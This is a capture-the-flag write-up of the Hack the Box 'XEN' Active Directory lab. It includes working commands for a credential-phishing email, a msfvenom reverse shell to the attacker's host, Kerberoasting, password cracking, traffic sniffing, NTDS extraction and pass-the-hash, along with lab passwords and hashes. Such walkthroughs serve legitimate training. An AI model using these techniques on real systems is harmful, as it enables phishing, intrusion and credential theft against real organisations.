[*] 10.13.38.11:1433 - xp_fixeddrives
[*] 10.13.38.11:1433 - sp_getschemalock
[*] 10.13.38.11:1433 - sp_prepexec
[*] 10.13.38.11:1433 - xp_revokelogin
[*] 10.13.38.11:1433 - sp_execute_external_script
[*] 10.13.38.11:1433 - sp_resyncuniquetable
[*] 10.13.38.11:1433 - sp_replflush
[*] 10.13.38.11:1433 - sp_resyncexecute
[*] 10.13.38.11:1433 - xp_grantlogin
[*] 10.13.38.11:1433 - sp_droporphans
[*] 10.13.38.11:1433 - xp_regread
[*] 10.13.38.11:1433 - sp_getbindtoken
[*] 10.13.38.11:1433 - sp_replincrementlsn
[*] 10.13.38.11:1433 - Instances found on this server:
[*] 10.13.38.11:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 10.13.38.11:1433 - xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mssql/mssql_enum) >

Author – Puckiestyle

 

htb-endgame-xen

Hack the Box – XEN ( retired june 2020 )

1st I add the IP of the machine 10.13.38.12 to /etc/hosts as xen.htb

NMAP

As always we start with a nmap scan

E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for humongousretail.com (10.13.38.12)
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| sequence of commands
| sequence of commands
| Hello:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| EHLO Invalid domain address.
| Help:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| NULL:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.70%I=7%D=4/9%Time=5E8F182C%P=i686-pc-windows-windows%r(N
SF:ULL,33,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LO
SF:CAL\)\r\n")%r(Hello,55,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(E
SF:XCHANGE\.HTB\.LOCAL\)\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\
SF:r\n")%r(Help,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE
SF:\.HTB\.LOCAL\)\r\n211\x20DATA\x20HELO\x20EHLO\x20MAIL\x20NOOP\x20QUIT\x
SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20
SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2
SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c
SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready
SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 24.00 ms 10.14.14.1
2 24.00 ms humongousretail.com (10.13.38.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

E:\PENTEST>

It seems we have HTTP and HTTPS on port 80 and 443, and SMTP on 25.

Overview of Web Services

Let’s take a quick look at the webpages to see what we have. I got the following on port 80, which redirected me to port 443, the certificate for the site provided and a new domain of hunongousretail.com.

I didn’t have much to go on, so I decided to do some directory enumeration.

Directory Enumeration

I used wfuzz in this case because gobuster didn’t come up with anything useful. wfuzz –hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ

Web Directories

We had several other directories that seemed interesting but the ones I wanted to look at are Remote and Jakarta.

Opening the https://hunongousretail.com/remote, I get the following.

And browsing https://hunongousretail.com/jakarta, I got the following.

I had a look at these for some time to see if I could come up with anything useful, I looked deeper into the directories and for known exploits for the XenAPP application.  Knowing this environment is called XEN, I decided to concentrate my efforts on the remote directory, rather than the Jakarta.  After spending some more time on this, I decided to investigate the SMTP service. I had done examples in the past where the users were very responsive.

SMTP Enumeration

I had the domain name of the company, therefore I decided to see if I could get any email addresses and see if I could somehow get a response from someone. smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12

I had found 4 addresses;

  • sales@humongousretail.com
  • it@humongousretail.com
  • marketing@humongousretail.com
  • legal@humongousretail.com

Now that I had these 4 addresses, I needed to ensure that I could send mail through.  I decided to use an internal address to try and get a response from someone.

User Response

To see if I was getting a response, I had a listener running to capture anything that may come through.

nc -nlvp 80

I then attempted a lot of different emails and a lot of different subjects.  I eventually got a hit with the subject of Remote.  My thoughts on this was to try and get the users to click on my link.  My thoughts were as follows;

telnet 10.13.38.12 25 helo humongousretail.com

MAIL FROM: it@hunongousretail.com

RCPT TO: sales@humongousretail.com

DATA Subject: Remote Portal Hi, The URL for the remote portal has now been changed to http://10.14.15.106 Regards

IT QUIT

I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something.  The users should trust an email coming in from IT, or so you would think.

Once the email had been sent, I didn’t get a response, but 30 seconds later, I had some data returned.  It was the user clicking on the link to the new portal and providing their credentials.

I had a username of pmorgan and a password of Summer1Summer!.  Although I knew that had worked, I tried again to ensure I had it correctly, and had a different user response.

I now had another user. This one being jmendes and password VivaBARC3L0N@!!!.

I kept this up to see if I could get any more responses and I had one more.

The last response I had gave me the user awardel and password @M3m3ntoM0ri@. I had 3 users

pmorgan:Summer1Summer! jmendes: VivaBARC3L0N@!!! awardel:@M3m3ntoM0ri@

Citrix XenAPP

I had the 3 users and knew that they must work somewhere.  I browsed to the remote site and entered the credentials of pmorgan

And I now had access to a desktop.

I tried this for each user that I had and each of the worked and successfully logged in.

I clicked on the Desktop to access and and was asked to open the launch.ica file which was defaulted to open with the Citrix Receiver Engine. after i installed icaclientWeb_19.12.0.19_amd64.deb on kali

Once I had click ok, I was presented with a Desktop.  I browsed to the Desktop of the user and I was presented with the 1st flag.

1 – XEN{wh0_n33d5_2f@?} Breach

Gaining a shell

Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges them.  I first made a note off all the users and desktops they were assigned to

I created the reverse shell that I wanted so that I could get a meterpreter session.

msfvenom –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe x86exploit.exe

I then proceeded to setup m msfconsole as follows.

 

Now that I had everything setup, I started the SimpleHTTPServer so that I could download the file necessary to exploit the system.

python -m SimpleHTTPServer 80

I then browsed to my machine on the vdesktop and downloaded the file.

I now started the exploit and got a meterpreter shell.

Privilege Escalation on Desktop

Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges.  I decided to use the local exploit suggester.

I first put my session to the background and started the suggester. use post/multi/recon/local_exploit_suggester

Seeing the results from the suggester, I decided on using the always install elevated exploit. use exploit/windows/local/always_install_elevated

I had successfully raised my privileges.  I looked to see what was on the Administrator Desktop, and I had found the second flag.

2 – XEN{7ru573d_1n574ll3r5} Deploy

Further Enumeration

Now that I had a way into the inside of the network, I saw the internal network as 172.16.249.0/24, I wanted to perform a quick scan of the network to identify hosts. To pivot within the internal network, I used a socks proxy within msf. use auxiliary/server/socks4a

Now that I had done this, I wanted to see what hosts were live on the internal network.  Knowing the IP’s of the desktops, I chose to only scan a small range.  I wanted to scan between 199 and 210.

I managed to get an additional 3 IP’s.

  • 172.16.249.200 (DC)
  • 172.16.249.201 (Citrix)
  • 172.16.249.202 (NetScaler)

Because of this, I decided to use a technique I had used in a previous engagement called Kerberoasting.

With the system shell that I had earlier, I decided to upload the Kerberoasting module.

Further credentials

I now wanted to see if there were any further credentials that I could find

PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt


______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.4.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Found 1 user(s) to Kerberoast!

[*] SamAccountName : mturner
[*] DistinguishedName : CN=Mark Turner,OU=Contractors,DC=htb,DC=local
[*] ServicePrincipalName : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt

[*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt
PS C:\Users\pmorgan\Desktop> dir


Directory: C:\Users\pmorgan\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 4/4/2020 11:13 AM 7 cmd.bat
-ar-- 4/6/2019 11:11 PM 19 flag.txt
-a--- 2/20/2020 6:53 PM 41534 Invoke-Portscan.ps1
-a--- 3/26/2020 10:56 AM 16128568 netscan64.exe
-a--- 4/6/2020 8:57 PM 295 netscan64.lic
-a--- 4/6/2020 8:57 PM 39301 netscan64.xml
-a--- 2/20/2020 6:30 PM 770279 powerview-dev.ps1
-a--- 9/22/2019 10:20 AM 883600 putty.exe
-a--- 11/27/2019 2:17 PM 198144 Rubeus.exe
-a--- 4/6/2020 9:12 PM 2172 service_ticket.txt
-a--- 3/28/2020 11:17 AM 832512 SharpHound.exe
-a--- 3/28/2020 11:17 AM 973323 SharpHound.ps1
-a--- 4/6/2020 8:59 PM 32665 winPEAS.bat
-a--- 4/6/2020 8:59 PM 241152 winPEAS.exe

[to get a proper command prompt we us]
PS C:\Users\pmorgan\Desktop> type cmd.cmd
cmd.exe

PS C:\Users\pmorgan\Desktop> type service_ticket.txt 
$krb5tgs$23$*mturner$htb.local$MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433*$107F90C880956CA6ABBBAB4F9C2FB71B$15B748ACB9F233974753E8F01B946449197403730D59DB4B2D72E600B8C7AC5D3178F52A1C5562A1146824D2F33756CBF95D70EAC796B6F1D006FF6CF3DC1D1EA05B6E9839D67AA634F7B0FD24C1CE69F7CE49B5314CCFA49D074BEA3A457E5EEA9F91822E7F1676439ED137A54E5ADF1546A6AB5CA3B808EECC77A5F2E94880B39457CD714425340EA8DFE186B9A90BE5C541D990C6C7E0C82F95043A81DC85DF709CF7E45151B022EA8275C4ED2F0578F9462847F9E1CF21BEFBA5FB187A810DFAD7D2D62C04785842CBD44BB1B8AA94E9D9EFA691A8FF54392210C635E8B004C42E4F71EFF3EC30599A33F1F434A1705FF4378E553071A6A974FB58569CCFDE795E39492AD893BDBF55916EA6763D63C1CF476ABA8FC24790F8954C80B5503147681BDA02EB8A9DDE56DE33A266851AFC99E72A6E08C5CA6BD127EC9AAA3BD3AE026E94BD481FF3583A28C9A3CF408110C4FF8551A27E615A15F0125AAB8761E8D5B1DA35858BE845D031F253E46EBE6987A94D1A8848820511226F95C4F0E27798E575F179C06EBB12C76EEAFD4CA977E085A392B06EB805033A229C26504AA8EB871041346DAB4B92D5400B030C6CFA0EE853656F4AAAF857F04B30D0BF7376B37634CE0DD3D82B78A3005E5C3E174915960674AE255995A3B37AFC82944D87920BE43302DFF9EAC0D559298D943FAFFBA118DA31688858C415342B729949B6366B07F3A8AD9B3B310A73EB689C38A087C4E05D9917DC46E01B25C808B7A3F93449E1E5CD7CA02018EA77DD3E339BDDF6ACF4CCC991BDAFB45E9809F9C12CF9358C5D07ABFA105E90206EE59B7ED6D5161BA186AF275AEC9B046B0E600585750BC259FA108CD62A0CFF191F4A30EFEE4BAFECCE07F3BAC3A22055672F4E761D220D5F8E1CB4BD51FA5BDCC8CDA524A709A389A31E913174455592CE322BFD32E572A7DF97C599E05CC3771A4FA952B9C34B273AD284DF237187EDCEAF2922AFBE3C4927E67B2B5FEA3F9AB57AD47436031EDB5A8D4C5D31FACF307E8CAAD66D61D6760CA3B9A4EDF10B0F6315B9D3FA7F7118EC6AA446F4642883D7DAF016CB4F7F8F3DB305AD0F6CB087FA149B4C439EE164B6B809EFD1A2FABDD115D77B1371B06968C8E6479BFB94C51763EE71A064D445D28FE30EF81EE3FDDF437C495305913C30F4B99E749187F1C09DD3DC10DD39B23AD5A84BE8CA906D3C01770CD71291FBC43D3D2A61E0DBD651106BFE97B6F2DFFF1A70F0BC825BD68D3B791CD67211162BA7C021D606FA0AD46175FF04E785607F186885802F0305F04876A5657CE9DB0BAECEBA1F2593DC7C8B70B295DE3D0F47201CD149232DCBB303853A4042677C96F9E286A06A8AB54F3FAAE0B3DCF2D92D76F511FB11492364C8AF22AC6F0462E039D66F74025BB76BC870B94388D69FD1295DF592C6205B8871BD55FCC5429EDCB690719836

PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" .
PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser
PS C:\Users\pmorgan\Desktop> Bypass
PS C:\Users\pmorgan\Desktop> .\Sharphound
PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1
PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound
PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All
PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\
PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" .
PS C:\Users\pmorgan\Desktop>
PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1
PS C:\Users\pmorgan\Desktop> Get-NetUser
PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName

I copied the contents of this token to a file named mturner so that I could now run this through hashcat.

I exhausted all password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with.  I eventually came up with a ruleset that had potential which was found at https://github.com/NSAKEY/nsarules.git.

hashcat  -m 13100 ./mturner rockyou.txt rules/_NSAKEY.v2.dive.rule –debug-mode=1 –debugfile=matched.rule –force -0

After several hours, I eventually got a hit on the password.

We now know that the password for mturner is 4install!

SMB Access

Now that I had the new credentials I looked about a little more to see what else I could find.  I eventually found SMB on 172.16.249.201 and decided to use the credentials found to see if I could see anything. proxychains smbmap -u mturner -p ‘4install!’ -d htb.local -H 172.16.249.201

This showed that we had access to read the files locate in the Citrix$ folder.  I connected to this to see what was inside the folder with smbclient tools.

proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local

I was provided with some interesting files. The 2 of interest at this point are flag.txt and private.ppk.

I downloaded these file and was able to read the next flag.

3 – XEN{l364cy_5pn5_ftw} Ghost

Putty file Conversion

Now that I had a putty private key file, I had a look at its contents to see if I could get a hint at anything.

It seems this could be used in putty but has a password on it too.  I needed to try and crack the password on this before I could proceed.  I decided to convert this with putty2john. putty2john private.ppk > private.hash

Now that I had this file in a readable format for john, I tried to crack the password.

After several hours, all my password lists came up empty.  I was unable to crack the password with what I had.  I decided to look elsewhere to see what I could potentially use as a password list generator.  I found a password generator that seemed interesting and decided to run with it.  I found this at https://github.com/hashcat/kwprocessor 

./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route

 

Once I had the password list generated, I then had to put it through john to try and crack it again. john -w=./passes private.hash

Now that I knew the password for the file, I could now convert the file for use with my system.  To do this, I used puttygen. puttygen private.ppk -O private-openssh -o id_rsa

I now had a key file that I could use.

Access to NetScaler

During the time gathering information, I had accumulated many user id’s and I tried all of them with the private key to get onto the SSH of the NetScaler.  I then quickly found the default username of the devices is nsroot.  I then attempted to login with this user id. proxychains ssh -i id_rsa nsroot@172.16.249.202

Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything.  After a while of searching, I did not come up with anything useful.  Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through the device and remembered a specific article at https://hackertarget.com/tcpdumpexamples/.

I attempted this to see if I would get any results. tcpdump -s 0 -A -n -l | egrep -I “POST /|pwd=|passwd=|password=|Host:”

 

4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage

LDAP

Knowing that I had access to this box as root, I wanted to perform some additional test to see what other potential traffic was being passed through it.  The previous flag seemed to suggest ldap could be being used. I set up a tcpdump to capture this for me. tcpdump -w capture.pcap

I now had to transfer the file back to my machine for investigation.  I used scp for this.

proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .

I then opened this file within Wireshark to see what I could find.

Now going from the previous hint, I searched for the LDAP traffic and found a password.

The password that I had found was #S3rvice#@cc which was for the netscaler-svc account.

msf > use auxiliary/server/socks4a
msf > set srvport 8888
msf > route add 172.16.249.0 255.255.255.0 1
msf exploit
root@kali:~/htb/xen# proxychains GetUserSPNs.py -request -dc-ip 172.16.249.200 HTB.LOCAL/netscaler-svc:#S3rvice#@cc
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:389-<><>-OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon 
---------------------------------- ------- --------------------------------------- -------------------------- --------------------------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 mturner CN=Deployment,OU=Groups,DC=htb,DC=local 2019-02-13 23:23:48.796612 2019-04-10 22:14:57.105936

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
$krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$30e2233e1b0123f3c7579d9f7a2384fb$08230b2c73edf5bc2afe0b13d494c385d67db84bc38ac830497f2e8eb1f2c148094dcd6f1cad0d26a896291119eb2a8cb196d388c568ce2348d4e69f16da74245af5298d42cf19c7958359f901d4a0f32ffb708e4ac037dd49411fce5e59ff58d6f3e184dcb7064b86c134bed4a6bf74af15875edd0800b464d3146559b62cadccd399484b4317f63aab2a9fe85ae08bfe4dece4ff25f040fa9de0c61f290670df1dd5b368a0c5b8c6e546bf547c6fbb63cb1bdf179d0eedb0ee37647a6a8e63d4a76b0e5d9f511e751cf8b4acfa4702aac9050a6e01496e4a4d26762805d950b27723d7e2a9831de5a8fdd78b8e480b16974ff4865114d74c1eee1715d5cd862afcff076f448c370c1b2ae0666770c00391c65384f525ff6f33210077e2b73cf0ae892352b3163fd0fde062e037adafbec57c705535d751efd0ecc31356cd8d933c29635107aa5add7043df5a20710a056869b872cb60203e7d7934574579837e01df2e57c580f4c6e19483c821bd5f533b378d43df50ad8fc6665bab80be7478462ccecca5208710a6b85b001ca602c2ab1920f6134ed5a59a27cd622ec2ffa6828ac4e65cb10b9d3dc5f61a50a7002ea737b41d9ffc603c0b54fe70764773468eced0d158a67ba15fe7c62083a01b447f5be2218a3ab6500378f69bacb34e6fcc1050320d9c965e75b188bf2d64ca89815b77220aa1300787e43fe9b0123447247b9ac82774c27425668d03930c48bde5cbb71d29b49d18c0473efb6a5707ca8498577b81f9a371b5fba0020699df3e0ad90566a9b366f731c98c2c1b1a454b0081aaf9d9074e69d3d0b47fcbf235b45d483bc37a0bb82f68623d6d2fd3d6bd43c2927bc713247fbcd5d492101b2b4f9b122b070897bae58d85730e5f718ad293401ea8fa9a9d691cf5e13c5187d91ed09ab4a2f5b57803e655e97145a7c0a9b371430d1f5e97e9f023f3a07ec587269758a6f2f2c2a58a2d8e61694c1950123edac23cbd9d007723d94b8542eef551a0459a50bed98f8a3d870bb8b55c2db8f12ed382fe9a4c5ed754eea8e14aa2c1b1cd15d3f2bed369071e2474eb93a0e9f9a2dfb986b25ed3459f5a956578d309fa74b6855beccdf7ba5e6facc63ebd1f6f251656b7756683582fe20e3b6cf669116df64ba68bd6beb3c09076a343f3f2b665b70d13ec65e18ddcea07bcae355517e1bdfb3bc2fc35542f08e9d29e5d1d047ecc04e4eed26bfbc8e397549820605811c7c154cfdd2650ee928d93fb770f55a84ce5ff864fbcb9e6a458f3b04c82d6d890315b0ae78227bea7ab43939d22466c27a8d8501eee6c7218dcdf772bde661302151ea644cfcc2576e8e462
root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201
ProxyChains-3.1 (http://proxychains.sf.net)
[+] Finding open SMB ports....
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
[+] User SMB session establishd on 172.16.249.201...
[+] IP: 172.16.249.201:445 Name: 172.16.249.201 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
Citrix$ READ ONLY
IPC$ NO ACCESS
ISOs NO ACCESS
ISOs-TEST NO ACCESS
root@kali:~/xen#
root@kali:~/xen# proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
Enter HTB.LOCAL\mturner's password: 4install!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed May 8 18:12:51 2019
.. D 0 Wed May 8 18:12:51 2019
Deploying-XenServer-5.6.pdf A 997001 Tue Feb 12 18:21:10 2019
flag.txt AR 20 Sun Mar 31 11:25:10 2019
private.ppk A 1486 Wed May 8 18:21:51 2019
XenServer-5-6-SHG.pdf A 1747587 Tue Feb 12 18:21:32 2019

10485247 blocks of size 4096. 6344443 blocks available

Doppelganger

The term doppelganger is a non-biologically related look-alike (Wikipedia).  This provided me with the hint of looking back at the other accounts that were active on the domain.  I immediately got access to a shell again on the desktop and looked up domain details.

I was looking for what was hopefully an account that may seem to be like the found netscaler-svc account.

After all, I had tried this account in so many different places to access different resources and none were successful.

net user /domain

After a few attempts at usernames, I discovered that the backup-svc had the same password as the NetScaler password.  These essentially shared the same password.  This was out doppelganger. I then tried to login to the Domain controller using winrm and proxychains to see if I could get a successful access because I knew it was a member of the Backup Operators group which generally has access. proxychains ruby winrm_shell_with_upload.rb

 

root@kali:~/xen# proxychains ruby winrmshell2withupload.rb 
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:5985-<><>-OK
PS htb\backup-svc@DC Documents> 
PS htb\backup-svc@DC Desktop> type flag.txt
XEN{y_5h4r3d_p@55w0Rd5?} 
PS htb\backup-svc@DC Desktop>

I looked on the Desktop of backup-svc and found the next flag.

5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger

Privileges

Now that I was on the box, I wanted to see what privileges I had to understand what else could be achieved with simply logging in through WinRM. whoami /priv

This was sure interesting.  It seems I had a few privileges including the Backup and Restore.  This seemed obvious though with the account being named backup-svc.

I first tried to access the Administrator Desktop and was denied access.

From this I knew something had to be done with backup privileges.  I had recently done an exercise in the office that I work in on retrieving the Active Directory Database to extract the hashes.  This is something that I do on a regular basis and therefore knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS.

I looked at all the usual methods of creating a shadow copy including vssadmin and wbadmin.  However, I then found an article which covered doing this with diskshadow.  This was highlighted in the following document. https://github.com/decoderit/whoamipriv

Hackinparis2019/blob/master/whoamiprivParis_Split.pdf.  I wanted to try and get RDP access to the machine and therefore setup a portfwd to give me access.

portfwd add -l 3389 -r 172.16.249.200 -p 3389

I then tried to open an RDP session to the machine using remmina.

I decided to utilise this to give myself hopefully a little more access proxychains xfreerdp ipv remmina

Install freerdp-x11

sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v:172.16.249.200 /u:backup-svc 
ProxyChains-3.1 (http://proxychains.sf.net)
[03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:3389-<><>-OK
Password: #S3rvice#@cc
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem

And I was given the RDP access I was looking for.

I now decided to run through diskshadow to see if I could create a shadow of the drive.

Shadow Copies

Diskshadow
set context persistent nowriters
add volume c: alias dmwong
create expose %dmwong% z:

Once I had created the backup, I restore this by importing the  modules found at

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Deb ug.

I opened PowerShell and imported the 2 modules.

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit reg save hklm\system c:\temp\system.bak

Now that I had access to these files, I continued to download them onto my system for offline cracking.

Domain Admin

Now that I had these files offline I needed to extract the hashes. python /opt/impacket/examples/secretdump.py -ntds ndts.dit -system system.bak LOCAL

This provided me with all the hashes from the Active Directory Database.  Now that I had all of these hashes, I decided to use the ‘Pass the Hash’ method to try and gain access to the Domain controller as Administrator.

proxychains python /opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200

6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned

Author – Puckiestyle